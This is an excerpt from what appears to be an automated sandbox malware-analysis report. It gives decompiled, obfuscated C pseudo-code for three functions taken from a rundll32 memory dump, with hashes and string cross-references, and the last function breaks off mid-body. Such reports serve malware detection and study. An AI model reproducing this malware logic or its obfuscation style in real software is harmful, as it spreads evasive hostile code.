Opcode Fuzzy Hash: b61ea4cf5397b2b2c19f2a3a7c23ca40aa1988279481e7acaa0648667e7a303d
Instruction Fuzzy Hash: CDB113715087809FE368CF65C98AA0FBBE1FBC8758F10891DF295962A0D7B68945CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100021C0, Relevance: 11.4, Strings: 9, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100021C0() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t200;
				void* _t201;
				void* _t208;
				intOrPtr _t212;
				intOrPtr _t214;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t248;
				void* _t250;

				_t250 = (_t248 & 0xfffffff8) - 0x258;
				_v576 = 0xd099;
				_v576 = _v576 >> 5;
				_t208 = 0x7e8dfe2;
				_v576 = _v576 + 0xc23a;
				_v576 = _v576 ^ 0x000089e7;
				_v540 = 0x264a;
				_v540 = _v540 << 7;
				_v540 = _v540 ^ 0x0013216b;
				_v600 = 0xaac1;
				_v600 = _v600 ^ 0xebbc2c08;
				_v600 = _v600 * 0x19;
				_v600 = _v600 + 0xffff7e5b;
				_v600 = _v600 ^ 0x0568eb05;
				_v560 = 0x46f6;
				_v560 = _v560 | 0x0684358d;
				_v560 = _v560 + 0xffff92f5;
				_v560 = _v560 ^ 0x06840ce1;
				_v528 = 0x7cd8;
				_v528 = _v528 | 0x7ddef0af;
				_v528 = _v528 ^ 0x7dde90ba;
				_v592 = 0x59f9;
				_v592 = _v592 ^ 0xff00e437;
				_t238 = 0xc;
				_v592 = _v592 / _t238;
				_v592 = _v592 + 0xffffd7d9;
				_v592 = _v592 ^ 0x153fe695;
				_v552 = 0x1246;
				_v552 = _v552 | 0xaa14f077;
				_v552 = _v552 + 0xffff460e;
				_v552 = _v552 ^ 0xaa1419a7;
				_v568 = 0x9965;
				_v568 = _v568 << 5;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x659424d3;
				_v556 = 0xbe92;
				_t239 = 0x6a;
				_v556 = _v556 / _t239;
				_t240 = 0x16;
				_v556 = _v556 / _t240;
				_v556 = _v556 ^ 0x00006ed3;
				_v544 = 0xacd9;
				_v544 = _v544 | 0xb6fcd975;
				_v544 = _v544 + 0xffff5d7a;
				_v544 = _v544 ^ 0xb6fc6156;
				_v536 = 0xe7e3;
				_v536 = _v536 >> 0xa;
				_v536 = _v536 ^ 0x00005322;
				_v604 = 0x6c30;
				_v604 = _v604 >> 1;
				_v604 = _v604 >> 9;
				_v604 = _v604 | 0x54452d8a;
				_v604 = _v604 ^ 0x544525f6;
				_v584 = 0xa6cc;
				_v584 = _v584 >> 0xd;
				_v584 = _v584 << 4;
				_v584 = _v584 ^ 0x00005b21;
				_v596 = 0x154a;
				_v596 = _v596 + 0xe90d;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 * 0x51;
				_v596 = _v596 ^ 0x00003933;
				_v572 = 0xa227;
				_t241 = 0x61;
				_v572 = _v572 / _t241;
				_t242 = 0x7f;
				_v572 = _v572 * 0x38;
				_v572 = _v572 ^ 0x00004244;
				_v580 = 0x4904;
				_v580 = _v580 | 0x8c43b02a;
				_v580 = _v580 * 0x7d;
				_v580 = _v580 ^ 0x7d30cf40;
				_v548 = 0x8fff;
				_v548 = _v548 ^ 0xcba53a06;
				_v548 = _v548 + 0xffff1ed3;
				_v548 = _v548 ^ 0xcba49d02;
				_v532 = 0x80c9;
				_v532 = _v532 ^ 0x0bb575e5;
				_v532 = _v532 ^ 0x0bb5b6a0;
				_v564 = 0x6869;
				_v564 = _v564 / _t242;
				_v564 = _v564 ^ 0xf615efb5;
				_v564 = _v564 ^ 0xf615ff3d;
				_v588 = 0x217e;
				_v588 = _v588 + 0x2179;
				_v588 = _v588 + 0x940f;
				_v588 = _v588 + 0xffff927f;
				_v588 = _v588 ^ 0x0000511d;
				do {
					while(_t208 != 0x7e8dfe2) {
						if(_t208 == 0xa1bf7af) {
							_t200 = E100040A7(_v596,  &_v524, _v572, _v580, _v548);
							_t250 = _t250 + 0xc;
							 *_t200 = 0;
							_t208 = 0x3b96d6e8;
							continue;
						} else {
							if(_t208 == 0x3abc49e4) {
								_push(_v560);
								_push(_v600);
								_push(_v540);
								_t201 = E1000B871(0x10001574, _v576, __eflags);
								_t212 =  *0x10021fd8; // 0x0
								_t214 =  *0x10021fd8; // 0x0
								E1000487B(_v592, __eflags, _t214 + 0x1c, _v552, _v568, _t201,  &_v524, _t214 + 0x1c, _v556, _t212 + 0x22c);
								_t200 = E1000717B(_v544, _v536, _v604, _t201, _v584);
								_t250 = _t250 + 0x38;
								_t208 = 0xa1bf7af;
								continue;
							} else {
								if(_t208 != 0x3b96d6e8) {
									goto L10;
								} else {
									_t200 = E100095DD(_v564,  &_v524, E1000799F,  &_v524, 0, _v588);
								}
							}
						}
						L6:
						return _t200;
					}
					_t208 = 0x3abc49e4;
					L10:
					__eflags = _t208 - 0x1203cfb8;
				} while (__eflags != 0);
				goto L6;
			}

0x100021c6
0x100021cc
0x100021d6
0x100021db
0x100021e0
0x100021e8
0x100021f0
0x100021f8
0x100021fd
0x10002205
0x1000220d
0x1000221e
0x10002222
0x1000222a
0x10002232
0x1000223a
0x10002242
0x1000224a
0x10002252
0x1000225a
0x10002262
0x1000226a
0x10002272
0x10002280
0x10002285
0x1000228b
0x10002293
0x1000229b
0x100022a3
0x100022ab
0x100022b3
0x100022bb
0x100022c3
0x100022c8
0x100022cd
0x100022d5
0x100022e1
0x100022e6
0x100022f0
0x100022f3
0x100022f7
0x100022ff
0x10002307
0x1000230f
0x10002317
0x1000231f
0x10002327
0x1000232c
0x10002334
0x1000233c
0x10002340
0x10002345
0x1000234d
0x10002355
0x1000235d
0x10002362
0x10002367
0x1000236f
0x10002377
0x1000237f
0x10002389
0x1000238d
0x10002395
0x100023aa
0x100023af
0x100023bf
0x100023c5
0x100023c9
0x100023d1
0x100023d9
0x100023e6
0x100023ea
0x100023f2
0x100023fa
0x10002402
0x1000240a
0x10002412
0x1000241a
0x10002422
0x1000242a
0x10002438
0x1000243c
0x10002444
0x1000244c
0x10002454
0x1000245c
0x10002464
0x1000246c
0x10002474
0x10002474
0x10002482
0x1000254a
0x1000254f
0x10002554
0x10002557
0x00000000
0x10002488
0x1000248a
0x100024bd
0x100024c6
0x100024ca
0x100024d2
0x100024d7
0x100024f1
0x1000250e
0x10002527
0x1000252c
0x1000252f
0x00000000
0x1000248c
0x1000248e
0x00000000
0x10002494
0x100024ad
0x100024b2
0x1000248e
0x1000248a
0x100024b5
0x100024bc
0x100024bc
0x1000255e
0x10002560
0x10002560
0x10002560
0x00000000

Strings

0l, xrefs: 10002334
"S, xrefs: 1000232C
ih, xrefs: 1000242A
J&, xrefs: 100021F0
y!, xrefs: 10002454
39, xrefs: 1000238D
7, xrefs: 10002272
![, xrefs: 10002367
DB, xrefs: 100023C9

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ![$"S$0l$39$7$DB$J&$ih$y!
API String ID: 0-1080273064
Opcode ID: 04043040f8e56575072e093244b0bbb9ade613a1e97df4a76441dd16ec68739b
Instruction ID: ce86904e181fc761fb6384ef9c0dffa63bd42280c4433dd13ae583192855fdcd
Opcode Fuzzy Hash: 04043040f8e56575072e093244b0bbb9ade613a1e97df4a76441dd16ec68739b
Instruction Fuzzy Hash: 719132715083409BE358CF25C88A85BFBF1FBC5798F104A1DF196962A0D7B98949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1000D535, Relevance: 10.3, Strings: 8, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000D535(void* __ecx, intOrPtr* __edx) {
				void* _t268;
				intOrPtr _t292;
				intOrPtr _t296;
				intOrPtr _t308;
				intOrPtr _t310;
				intOrPtr* _t312;
				signed int _t314;
				intOrPtr _t321;
				signed int _t322;
				void* _t350;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				void* _t362;
				void* _t363;
				void* _t366;

				_t351 =  *((intOrPtr*)(_t362 + 0x84));
				_t312 = __edx;
				_push(_t351);
				_push( *((intOrPtr*)(_t362 + 0x88)));
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t268);
				 *((intOrPtr*)(_t362 + 0x4c)) = 0x84b1;
				_t363 = _t362 + 0x10;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) + 0xffff523d;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) + 0xf98c;
				_t350 = 0;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) ^ 0x0000e7b3;
				_t314 = 0x53ec97;
				 *(_t363 + 0x6c) = 0x62de;
				 *(_t363 + 0x6c) =  *(_t363 + 0x6c) + 0xd6dd;
				 *(_t363 + 0x6c) =  *(_t363 + 0x6c) ^ 0x000130dc;
				 *(_t363 + 0x60) = 0x3e48;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) + 0xa5ef;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) + 0x3688;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) ^ 0x00015da6;
				 *(_t363 + 0x38) = 0xfa0f;
				_t352 = 0x7a;
				 *(_t363 + 0x3c) =  *(_t363 + 0x38) / _t352;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) | 0x7a28ca31;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) << 0xd;
				 *(_t363 + 0x3c) =  *(_t363 + 0x3c) ^ 0x1947f957;
				 *(_t363 + 0x60) = 0xc582;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) + 0x9c68;
				_t353 = 0x66;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) / _t353;
				 *(_t363 + 0x60) =  *(_t363 + 0x60) ^ 0x000029be;
				 *(_t363 + 0x5c) = 0xe0f2;
				_t354 = 0x23;
				 *(_t363 + 0x5c) =  *(_t363 + 0x5c) / _t354;
				 *(_t363 + 0x5c) =  *(_t363 + 0x5c) >> 3;
				 *(_t363 + 0x5c) =  *(_t363 + 0x5c) ^ 0x00007e47;
				 *(_t363 + 0x20) = 0x4c71;
				 *(_t363 + 0x20) =  *(_t363 + 0x20) << 7;
				_t355 = 0x6f;
				 *(_t363 + 0x1c) =  *(_t363 + 0x20) * 0x3d;
				 *(_t363 + 0x1c) =  *(_t363 + 0x1c) >> 0xc;
				 *(_t363 + 0x1c) =  *(_t363 + 0x1c) ^ 0x0000d4f3;
				 *(_t363 + 0x18) = 0x42c7;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) | 0xcc13b914;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) ^ 0x49c2884c;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) | 0x65511c38;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) ^ 0xe5d11cc9;
				 *(_t363 + 0x4c) = 0xeef2;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) ^ 0xfd605a4e;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) / _t355;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) ^ 0x0248439c;
				 *(_t363 + 0x34) = 0x243a;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) ^ 0xf503c7ce;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) + 0x52e8;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) | 0xe96c270b;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) ^ 0xfd6c0c84;
				 *(_t363 + 0x30) = 0xc2ea;
				_t356 = 0xf;
				 *(_t363 + 0x34) =  *(_t363 + 0x30) / _t356;
				_t357 = 0x41;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) * 0x69;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) >> 2;
				 *(_t363 + 0x34) =  *(_t363 + 0x34) ^ 0x00015f43;
				 *(_t363 + 0x4c) = 0x9536;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) + 0xffffe969;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) + 0x982a;
				 *(_t363 + 0x4c) =  *(_t363 + 0x4c) ^ 0x0001539a;
				 *(_t363 + 0x18) = 0xaf1e;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) + 0xd546;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) + 0x820b;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) << 5;
				 *(_t363 + 0x18) =  *(_t363 + 0x18) ^ 0x004083e7;
				 *(_t363 + 0x48) = 0x5e62;
				 *(_t363 + 0x48) =  *(_t363 + 0x48) | 0x80e6653c;
				 *(_t363 + 0x48) =  *(_t363 + 0x48) + 0x8c71;
				 *(_t363 + 0x48) =  *(_t363 + 0x48) ^ 0x80e77391;
				 *(_t363 + 0x14) = 0x8c55;
				 *(_t363 + 0x14) =  *(_t363 + 0x14) | 0x42887832;
				 *(_t363 + 0x14) =  *(_t363 + 0x14) >> 3;
				 *(_t363 + 0x14) =  *(_t363 + 0x14) * 0x79;
				 *(_t363 + 0x14) =  *(_t363 + 0x14) ^ 0xee578b80;
				 *(_t363 + 0x74) = 0x275c;
				 *(_t363 + 0x74) =  *(_t363 + 0x74) + 0xffffe8bc;
				 *(_t363 + 0x74) =  *(_t363 + 0x74) ^ 0x00003ddb;
				 *(_t363 + 0x44) = 0xbab8;
				 *(_t363 + 0x44) =  *(_t363 + 0x44) >> 0xb;
				 *(_t363 + 0x44) =  *(_t363 + 0x44) + 0xffff3f6b;
				 *(_t363 + 0x44) =  *(_t363 + 0x44) ^ 0xffff55f3;
				 *(_t363 + 0x58) = 0xd8c9;
				 *(_t363 + 0x58) =  *(_t363 + 0x58) >> 1;
				 *(_t363 + 0x58) =  *(_t363 + 0x58) + 0xffff491b;
				 *(_t363 + 0x58) =  *(_t363 + 0x58) ^ 0xffffa335;
				 *(_t363 + 0x30) = 0x5ca6;
				 *(_t363 + 0x30) =  *(_t363 + 0x30) + 0xa09e;
				 *(_t363 + 0x30) =  *(_t363 + 0x30) + 0x3d38;
				 *(_t363 + 0x30) =  *(_t363 + 0x30) * 0x7e;
				 *(_t363 + 0x30) =  *(_t363 + 0x30) ^ 0x009ab9da;
				 *(_t363 + 0x7c) = 0xddda;
				 *(_t363 + 0x7c) =  *(_t363 + 0x7c) | 0xb911bcc5;
				 *(_t363 + 0x7c) =  *(_t363 + 0x7c) ^ 0xb911b584;
				 *(_t363 + 0x2c) = 0x5465;
				 *(_t363 + 0x2c) =  *(_t363 + 0x2c) << 6;
				 *(_t363 + 0x2c) =  *(_t363 + 0x2c) | 0xe4a9c680;
				 *(_t363 + 0x2c) =  *(_t363 + 0x2c) / _t357;
				 *(_t363 + 0x2c) =  *(_t363 + 0x2c) ^ 0x0384c98e;
				 *(_t363 + 0x28) = 0x4a95;
				 *(_t363 + 0x28) =  *(_t363 + 0x28) >> 0xa;
				 *(_t363 + 0x28) =  *(_t363 + 0x28) | 0xe64d879a;
				 *(_t363 + 0x28) =  *(_t363 + 0x28) << 0xa;
				 *(_t363 + 0x28) =  *(_t363 + 0x28) ^ 0x361e033e;
				 *(_t363 + 0x78) = 0xb65b;
				_t358 = 0x3d;
				 *(_t363 + 0x74) =  *(_t363 + 0x78) / _t358;
				 *(_t363 + 0x74) =  *(_t363 + 0x74) ^ 0x000009b0;
				 *(_t363 + 0x20) = 0xb7ce;
				 *(_t363 + 0x20) =  *(_t363 + 0x20) ^ 0x5faf85ce;
				 *(_t363 + 0x20) =  *(_t363 + 0x20) * 0x4b;
				 *(_t363 + 0x20) =  *(_t363 + 0x20) * 0x7c;
				 *(_t363 + 0x20) =  *(_t363 + 0x20) ^ 0x088417bb;
				 *(_t363 + 0x50) = 0x51d6;
				 *(_t363 + 0x50) =  *(_t363 + 0x50) | 0x4c8cd6d3;
				_t359 = 0x59;
				 *(_t363 + 0x50) =  *(_t363 + 0x50) / _t359;
				 *(_t363 + 0x50) =  *(_t363 + 0x50) ^ 0x00dc66d2;
				_t360 =  *(_t363 + 0x7c);
				while(1) {
					L1:
					_t344 =  *((intOrPtr*)(_t363 + 0x68));
					_t292 =  *((intOrPtr*)(_t363 + 0x64));
					do {
						while(1) {
							L2:
							_t366 = _t314 - 0x1bcd5c7f;
							if(_t366 > 0) {
								break;
							}
							if(_t366 == 0) {
								E1000A66C( *(_t363 + 0x7c));
								_t314 = 0x13e92e29;
								while(1) {
									L1:
									_t344 =  *((intOrPtr*)(_t363 + 0x68));
									_t292 =  *((intOrPtr*)(_t363 + 0x64));
									goto L2;
								}
							}
							if(_t314 == 0x53ec97) {
								_t314 = 0x1ffc2161;
								continue;
							}
							if(_t314 == 0x8ed3040) {
								_t296 =  *0x10021fd4; // 0x0
								E10013E5E(_t314, _t363 + 0x7c,  *(_t363 + 0x2c),  *((intOrPtr*)(_t363 + 0x24)), _t314,  *(_t363 + 0x50),  *((intOrPtr*)(_t296 + 0x24)));
								_t363 = _t363 + 0x14;
								asm("sbb ecx, ecx");
								_t314 = (_t314 & 0x0eb5ecd2) + 0x13e92e29;
								while(1) {
									L1:
									_t344 =  *((intOrPtr*)(_t363 + 0x68));
									_t292 =  *((intOrPtr*)(_t363 + 0x64));
									goto L2;
								}
							}
							if(_t314 == 0xa7f592f) {
								_t321 =  *0x10021fd4; // 0x0
								_t322 =  *(_t321 + 0x10);
								E1000A581(_t322,  *((intOrPtr*)(_t363 + 0x70)),  *(_t363 + 0x38),  *((intOrPtr*)(_t363 + 0x64)), _t314,  *(_t363 + 0x28),  *((intOrPtr*)(_t363 + 0x90)),  *_t351, _t351 + 4, _t314,  *(_t363 + 0x74),  *((intOrPtr*)(_t363 + 0x40)));
								_t363 = _t363 + 0x28;
								asm("sbb ecx, ecx");
								_t314 = (_t322 & 0x140a2a9f) + 0x1bcd5c7f;
								while(1) {
									L1:
									_t344 =  *((intOrPtr*)(_t363 + 0x68));
									_t292 =  *((intOrPtr*)(_t363 + 0x64));
									goto L2;
								}
							}
							if(_t314 == 0x13e92e29) {
								if(_t350 == 0) {
									E100033F4( *(_t363 + 0x6c),  *(_t363 + 0x44),  *((intOrPtr*)(_t363 + 0x64)),  *(_t363 + 0x5c),  *_t351);
								}
								L29:
								return _t350;
							}
							if(_t314 != 0x164a70bb) {
								goto L25;
							}
							 *((intOrPtr*)(_t351 + 4)) =  *((intOrPtr*)(_t312 + 4)) - 0x74;
							_push(_t314);
							_t308 = E1000A0AD( *((intOrPtr*)(_t351 + 4)), _t344);
							 *_t351 = _t308;
							if(_t308 == 0) {
								goto L29;
							}
							_t292 =  *_t312;
							_t314 = 0x8ed3040;
							 *((intOrPtr*)(_t363 + 0x64)) = _t292;
							_t360 =  *((intOrPtr*)(_t312 + 4)) - 0x74;
							_t234 = _t292 + 0x74; // 0x74
							_t344 = _t234;
							 *((intOrPtr*)(_t363 + 0x68)) = _t234;
						}
						if(_t314 == 0x1ffc2161) {
							if( *((intOrPtr*)(_t312 + 4)) < 0x74) {
								_t314 = 0xa3f1d2b;
								goto L25;
							}
							_t314 = 0x32778aa3;
							goto L2;
						}
						if(_t314 == 0x229f1afb) {
							E1000E2FD( *_t351,  *(_t363 + 0x3c), _t360,  *(_t363 + 0x34), _t344);
							_t363 = _t363 + 0xc;
							_t314 = 0xa7f592f;
							while(1) {
								L1:
								_t344 =  *((intOrPtr*)(_t363 + 0x68));
								_t292 =  *((intOrPtr*)(_t363 + 0x64));
								goto L2;
							}
						}
						if(_t314 == 0x2fd7871e) {
							_t310 =  *0x10021fd4; // 0x0
							E1001821E( *(_t363 + 0x7c),  *(_t363 + 0x48),  *((intOrPtr*)(_t310 + 0x20)), _t314, _t314,  *((intOrPtr*)(_t363 + 0x94)),  *((intOrPtr*)(_t363 + 0x8c)),  *(_t363 + 0x38),  *(_t363 + 0x30), _t314, _t292,  *(_t363 + 0x74));
							_t363 = _t363 + 0x28;
							_t350 =  !=  ? 1 : _t350;
							_t314 = 0x1bcd5c7f;
							goto L1;
						}
						if(_t314 != 0x32778aa3) {
							goto L25;
						}
						_t314 = 0x164a70bb;
						goto L2;
						L25:
					} while (_t314 != 0xa3f1d2b);
					goto L29;
				}
			}

0x1000d53b
0x1000d542
0x1000d545
0x1000d546
0x1000d54d
0x1000d54e
0x1000d54f
0x1000d554
0x1000d55c
0x1000d55f
0x1000d569
0x1000d571
0x1000d573
0x1000d57b
0x1000d580
0x1000d588
0x1000d590
0x1000d598
0x1000d5a0
0x1000d5a8
0x1000d5b0
0x1000d5b8
0x1000d5c6
0x1000d5cb
0x1000d5d1
0x1000d5d9
0x1000d5de
0x1000d5e6
0x1000d5ee
0x1000d5fa
0x1000d5ff
0x1000d605
0x1000d60d
0x1000d619
0x1000d61e
0x1000d624
0x1000d629
0x1000d631
0x1000d639
0x1000d643
0x1000d644
0x1000d648
0x1000d64d
0x1000d655
0x1000d65d
0x1000d665
0x1000d66d
0x1000d675
0x1000d67d
0x1000d685
0x1000d693
0x1000d697
0x1000d69f
0x1000d6a7
0x1000d6af
0x1000d6b7
0x1000d6bf
0x1000d6c9
0x1000d6d7
0x1000d6dc
0x1000d6e7
0x1000d6ea
0x1000d6ee
0x1000d6f3
0x1000d6fb
0x1000d703
0x1000d70b
0x1000d713
0x1000d71b
0x1000d723
0x1000d72b
0x1000d733
0x1000d738
0x1000d740
0x1000d748
0x1000d750
0x1000d758
0x1000d760
0x1000d768
0x1000d770
0x1000d77a
0x1000d77e
0x1000d786
0x1000d78e
0x1000d796
0x1000d79e
0x1000d7a6
0x1000d7ab
0x1000d7b3
0x1000d7bb
0x1000d7c3
0x1000d7c7
0x1000d7cf
0x1000d7d7
0x1000d7df
0x1000d7e7
0x1000d7f4
0x1000d7f8
0x1000d800
0x1000d808
0x1000d810
0x1000d818
0x1000d820
0x1000d825
0x1000d835
0x1000d839
0x1000d841
0x1000d849
0x1000d84e
0x1000d856
0x1000d85b
0x1000d863
0x1000d86f
0x1000d872
0x1000d876
0x1000d87e
0x1000d886
0x1000d893
0x1000d89c
0x1000d8a0
0x1000d8a8
0x1000d8b0
0x1000d8c0
0x1000d8c3
0x1000d8c7
0x1000d8cf
0x1000d8d3
0x1000d8d3
0x1000d8d3
0x1000d8d7
0x1000d8db
0x1000d8db
0x1000d8db
0x1000d8db
0x1000d8e1
0x00000000
0x00000000
0x1000d8e7
0x1000da00
0x1000da06
0x1000d8d3
0x1000d8d3
0x1000d8d3
0x1000d8d7
0x00000000
0x1000d8d7
0x1000d8d3
0x1000d8f3
0x1000d9ea
0x00000000
0x1000d9ea
0x1000d8ff
0x1000d9b4
0x1000d9cd
0x1000d9d2
0x1000d9d7
0x1000d9df
0x1000d8d3
0x1000d8d3
0x1000d8d3
0x1000d8d7
0x00000000
0x1000d8d7
0x1000d8d3
0x1000d90b
0x1000d98e
0x1000d994
0x1000d997
0x1000d99c
0x1000d9a1
0x1000d9a9
0x1000d8d3
0x1000d8d3
0x1000d8d3
0x1000d8d7
0x00000000
0x1000d8d7
0x1000d8d3
0x1000d913
0x1000dacd
0x1000dae1
0x1000dae6
0x1000dae9
0x1000daf2
0x1000daf2
0x1000d91f
0x00000000
0x00000000
0x1000d92b
0x1000d936
0x1000d93a
0x1000d93f
0x1000d944
0x00000000
0x00000000
0x1000d94a
0x1000d94c
0x1000d954
0x1000d958
0x1000d95b
0x1000d95b
0x1000d95e
0x1000d95e
0x1000da16
0x1000daac
0x1000dab8
0x00000000
0x1000dab8
0x1000daae
0x00000000
0x1000daae
0x1000da22
0x1000da96
0x1000da9b
0x1000da9e
0x1000d8d3
0x1000d8d3
0x1000d8d3
0x1000d8d7
0x00000000
0x1000d8d7
0x1000d8d3
0x1000da2a
0x1000da57
0x1000da70
0x1000da77
0x1000da7d
0x1000da80
0x00000000
0x1000da80
0x1000da32
0x00000000
0x00000000
0x1000da38
0x00000000
0x1000dabd
0x1000dabd
0x00000000
0x1000dac9

Strings

eT, xrefs: 1000D818
R, xrefs: 1000D6AF
\', xrefs: 1000D786
G~, xrefs: 1000D629
b^, xrefs: 1000D740
qL, xrefs: 1000D631
8=, xrefs: 1000D7E7
H>, xrefs: 1000D598

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8=$G~$H>$\'$b^$eT$qL$R
API String ID: 0-903231968
Opcode ID: 9f128420ef97e357657d49a9e5929407de859d91967dbfcb68ba28ce61488e08
Instruction ID: 14656e8edbc0aab57534cbe9e2bba7b26d3137120b651bc286ae5cd2b1ed24ac
Opcode Fuzzy Hash: 9f128420ef97e357657d49a9e5929407de859d91967dbfcb68ba28ce61488e08
Instruction Fuzzy Hash: ECE141715083409FE358CF21C98991FBBE1FBC5748F508A1EF6A68A2A0D7B58945CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10006AFC, Relevance: 10.3, Strings: 8, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10006AFC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t265;
				signed int _t280;
				void* _t285;
				intOrPtr _t288;
				void* _t295;
				short _t296;
				void* _t298;
				signed int _t305;
				signed int _t306;
				void* _t308;
				intOrPtr* _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t346;
				signed int _t348;
				signed int* _t350;
				void* _t352;

				_push(_a12);
				_t335 = _a8;
				_push(_t335);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t265);
				_v8 = _v8 & 0x00000000;
				_t350 =  &(( &_v124)[5]);
				_v84 = 0x4a1a;
				_v84 = _v84 ^ 0x069b5e7c;
				_t308 = 0x34e0d7ad;
				_t339 = 0x49;
				_v84 = _v84 * 0x7e;
				_v84 = _v84 ^ 0x4054f7dd;
				_v92 = 0x48ca;
				_v92 = _v92 | 0x39dac096;
				_v92 = _v92 + 0xffff9b3d;
				_v92 = _v92 ^ 0x39da147a;
				_v96 = 0x8d1e;
				_v96 = _v96 | 0xfeefe7ff;
				_v96 = _v96 ^ 0xfeefd32d;
				_v24 = 0x8bcb;
				_v24 = _v24 * 0x14;
				_v24 = _v24 ^ 0x000ad5e5;
				_v28 = 0x856;
				_v28 = _v28 | 0x0ff83b9e;
				_v28 = _v28 ^ 0x0ff83756;
				_v32 = 0xbeb7;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x0000003c;
				_v36 = 0x9e98;
				_v36 = _v36 / _t339;
				_v36 = _v36 ^ 0x0000698b;
				_v52 = 0x1679;
				_v52 = _v52 + 0xffff4024;
				_v52 = _v52 ^ 0xffff3a93;
				_v88 = 0x4a7a;
				_t340 = 7;
				_v88 = _v88 * 0x35;
				_v88 = _v88 << 9;
				_v88 = _v88 ^ 0x1ed691f2;
				_v64 = 0x7697;
				_v64 = _v64 + 0xbac;
				_v64 = _v64 ^ 0x00009232;
				_v68 = 0xe099;
				_v68 = _v68 | 0x4425640c;
				_v68 = _v68 ^ 0x4425cab2;
				_v56 = 0xdb6;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x00db1edd;
				_v60 = 0xc43b;
				_v60 = _v60 / _t340;
				_v60 = _v60 ^ 0x00000043;
				_v116 = 0xac6a;
				_t341 = 0x7b;
				_v116 = _v116 / _t341;
				_v116 = _v116 + 0xffff22e0;
				_v116 = _v116 + 0x37fc;
				_v116 = _v116 ^ 0xffff7027;
				_v120 = 0x3f7;
				_v120 = _v120 + 0xffff789c;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0xec3ac2a8;
				_v120 = _v120 ^ 0x13c7497b;
				_v40 = 0xe630;
				_t342 = 0x2e;
				_t348 = _v4;
				_v40 = _v40 * 0x15;
				_v40 = _v40 ^ 0x0012eef0;
				_v44 = 0x972a;
				_t305 = _v4;
				_v44 = _v44 * 0x28;
				_v44 = _v44 ^ 0x001794aa;
				_v48 = 0x2c85;
				_v48 = _v48 / _t342;
				_v48 = _v48 ^ 0x000071fe;
				_v16 = 0xfd96;
				_t280 = _v16;
				_t343 = 0x3b;
				_t332 = _t280 % _t343;
				_t344 = _v4;
				_v16 = _t280 / _t343;
				_v16 = _v16 ^ 0x00003027;
